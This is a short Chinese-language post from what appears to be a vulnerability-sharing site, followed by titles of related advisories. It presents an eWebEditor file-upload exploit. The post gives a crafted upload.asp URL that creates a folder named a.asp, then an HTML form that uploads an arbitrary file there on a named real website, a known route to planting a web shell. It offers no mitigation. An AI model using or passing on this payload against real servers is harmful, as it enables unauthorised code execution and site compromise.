ewebeditor通杀鸡肋0day漏洞
摘要:先访问这个地址Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir...
先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码上传。
<form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
【ewebeditor通杀鸡肋0day漏洞】相关文章:
★ Cisco Unified Communications 远程命令执行漏洞
★ Apple Safari KHTML WebKit远程拒绝执行服务漏洞
★ Belkin Wireless G Router绕过限制 拒绝服务漏洞
★ Cisco Internetwork Performance Monitor 的漏洞
★ EMC DiskXtender MediaStor组件远程格式串处理漏洞
★ eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)
下一篇:
PHP漏洞全解